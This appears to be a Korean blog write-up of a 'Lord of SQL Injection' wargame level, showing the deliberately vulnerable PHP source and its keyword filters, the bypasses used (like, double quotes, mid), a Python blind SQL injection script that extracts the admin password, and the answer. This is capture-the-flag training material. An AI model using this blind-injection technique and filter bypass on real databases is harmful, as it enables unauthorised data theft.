728x90
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");  // prob(대소문자 모두 필터링), _, ., () 필터링
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");  // pw 값에 ' 필터링
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");  // no 값에 ', substr, ascii 필터링
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

= 대신 like, ' 대신 ", substr 대신 mid 함수를 사용해서 우회했다.

import requests

url='https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
cookie={'PHPSESSID':'자신의 세션 id'}
HEX='0123456789ABCDEF'

#16
def find_pw_len():
    pw_len=1
    while True:
        r=requests.get(url+'?no=123 or id like "admin" and length(hex(pw)) like {}'.format(pw_len),cookies=cookie)
        if 'Hello admin' in r.text:
            return pw_len
        else:
            pw_len+=1
#0b70ea1f
def find_pw():
    pw_len=find_pw_len()
    tmp=''
    for i in range(1,pw_len+1):
        for j in HEX:
            r=requests.get(url+'?no=123 or id like "admin" and mid(hex(pw),{},1) like "{}"'.format(i,j),cookies=cookie)
            if 'Hello admin' in r.text:
                tmp+=j
                if len(tmp)==2:
                    print(chr(int(tmp,16)),end="")
                    tmp=''
                break
            
find_pw()

답: ?pw=0b70ea1f

728x90

'Lord of SQL Injection' 카테고리의 다른 글

giant  (0) 2022.12.23
bugbear  (0) 2022.12.22
golem  (0) 2022.12.22
skeleton  (0) 2022.12.22
vampire  (0) 2022.12.22

+ Recent posts